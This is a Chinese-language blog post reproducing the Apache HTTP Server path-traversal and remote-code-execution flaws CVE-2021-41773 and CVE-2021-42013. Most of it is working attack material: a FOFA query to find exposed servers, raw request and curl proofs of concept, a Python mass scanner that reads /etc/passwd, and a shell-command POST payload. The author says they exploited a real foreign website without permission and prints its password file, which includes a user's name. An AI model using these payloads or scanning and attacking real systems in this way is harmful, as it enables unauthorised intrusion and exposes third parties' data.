CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行

简介: CVE-2021-41773|CVE-2021-42013——Apache HTTP Server路径遍历|远程代码执行

漏洞复现

image.png

本来想着8点多了休息一下,结果老板发信息说复现一下漏洞。那我就整一下吧。前几天电脑坏了之后里面东西丢了,虚拟机搭建的漏洞复现环境也没有了,所以只能FOFA找个网站直接干了。

image.png

https://pastebin.com/DHpCNz9n

目录穿越文件读取漏洞只影响2.4.49,2.4.50不完全修复可绕过,如果开启mod_cgi可RCE

CVE-2021-41773

Apache HTTP Server路径遍历

漏洞描述

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL  映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI  脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。

影响版本

  • Apache HTTP Server 2.4.49

fofa语法

server="Apache/2.4.49"

image.png

POC

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080

单个URL的POC

curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

批量检测POC

import urllib.request
import ssl
from colorama import init
#添加Headers信息
headers = {
     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36',
 }
for ip in open('server=Apache2.4.49.txt','r'):
     ipv = ip.strip('\r\n')
     url = f'{ipv}/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
     #防止ssl报错
     context = ssl._create_unverified_context()
     try:
          re = urllib.request.Request(url=url,headers=headers)
          response = urllib.request.urlopen(re,context=context,timeout=3)
          response = response.read().decode('utf-8')  
          if "root:x:" in str(response):
               print(f"\033[0;31m{url}\033[0m 可能存在漏洞")
               with open('vul.txt','a',encoding='utf-8') as f:
                    f.write(ipv+"\r")
          else:
               print(f"{ipv}不存在漏洞")
     except Exception as w:
          print(f"{ipv}不存在漏洞")

YOU漏洞的Url

https://X.X.X.X/etc/passwd

image.png

网站是个国外的Ubuntu-Apache2.4.49搭建的

image.png

漏洞测试

请求包

GET https://X.X.X.X//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0

回应包

Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
admin:x:1000:1000:,,,:/home/admin:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
sandi:x:1001:1001:Sandi Molinari,,,:/home/sandi:/bin/bash
tims:x:1002:1002:TIMS,,,:/home/tims:/bin/bash
newtims:x:1003:1003:New TIMS,,,:/home/newtims:/bin/bash

目录穿越

image.png

CVE-2021-42013

Apache HTTP Server远程代码执行

漏洞描述

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将  URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝”  的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。是为提供网络服务而执行控制台应用 (或称命令行界面)的程序,提供于服务器上实现动态网页的通用协议。

影响版本

若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

  • Apache HTTP Server 2.4.49
  • Apache HTTP Server 2.4.50

POC

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/plain
Content-Length: 8
echo; id

漏洞测试

FOFA找了好多都没有开启Apache-cgi的网站,所以在靶场中测试了一下。

GET http://X.X.X.X:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: X.X.X.X:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cde5771ac040-gzip"
If-Modified-Since: Sat, 09 Oct 2021 06:18:33 GMT
Connection: close
Content-Length: 43
echo Content-Type: text/plain; echo; 命令

image.png


相关文章
|
7月前
|
网络协议 Shell 网络安全
实验目的1.编译安装httpd2.优化路径3.并将鲜花网站上传到web服务器为网页目录4.在客户机访问网站http://www.bdqn.com
实验目的1.编译安装httpd2.优化路径3.并将鲜花网站上传到web服务器为网页目录4.在客户机访问网站http://www.bdqn.com
222 0
|
4月前
|
安全 Java 网络安全
Apache Struts 2 2.3.14.3 远程代码执行(CVE-2013-2134)
Apache Struts 2 2.3.14.3 远程代码执行(CVE-2013-2134)
Apache Struts 2 2.3.14.3 远程代码执行(CVE-2013-2134)
|
4月前
|
安全 Java 网络安全
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)远程代码执行(CVE-2013-1965)
Apache Struts Showcase App 2.0.0 到 2.3.13(在 2.3.14.3 之前的 Struts 2 中使用)远程代码执行(CVE-2013-1965)
|
5月前
|
Java 数据库连接 应用服务中间件
表单数据返回不到,HTTP状态 404 - 未找未找到,解决方法,针对这个问题,写一篇文章,理一下思路,仔细与原项目比对,犯错的原因是Mapper层的select查询表单数据写错,注意打开的路径对不对
表单数据返回不到,HTTP状态 404 - 未找未找到,解决方法,针对这个问题,写一篇文章,理一下思路,仔细与原项目比对,犯错的原因是Mapper层的select查询表单数据写错,注意打开的路径对不对
|
关系型数据库 MySQL 应用服务中间件
Centos中查看nginx、apache、php、mysql配置文件路径
Centos中查看nginx、apache、php、mysql配置文件路径
2386 0
|
安全 Java Shell
Apache Log4j2 远程代码执行漏洞
Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
113 2
|
安全 Apache
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
影响版本 Apache 2.4.49 Apache 2.4.50 当前描述 发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。 环境搭建可以查看我的上一篇文章 https://developer.aliyun.com/article/11136
386 0
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
|
缓存 JavaScript
Node.js——path路径,http,npm与包,模块化
Node.js知识点 一、fs(文件系统) 二、path(路径) 三、http(服务器) 四、npm与包 五、模块化 一、fs(文件系统) (1) 读取指定文件内容 fs.readFile(path[,option],callback 参数1:字符串,表示文件的路径 参数2,表示以什么编码格式读取文件 参数3:读取完成后,通过会点函数读取结果 (2) 向指定的文件中写入内容 fs.writeFile(file,data[,options],callback) 参数1:指文件路径的字符串,表示文件的存放路径 参数2:表示要写入的内容 参数3:表示写入内容的格式,默认值是utf8
167 0
Node.js——path路径,http,npm与包,模块化
|
安全 Windows
HTTP协议栈远程代码执行漏洞(CVE-2022-21907)
HTTP协议栈远程代码执行漏洞(CVE-2022-21907)
386 0
HTTP协议栈远程代码执行漏洞(CVE-2022-21907)

推荐镜像

更多
下一篇
DataWorks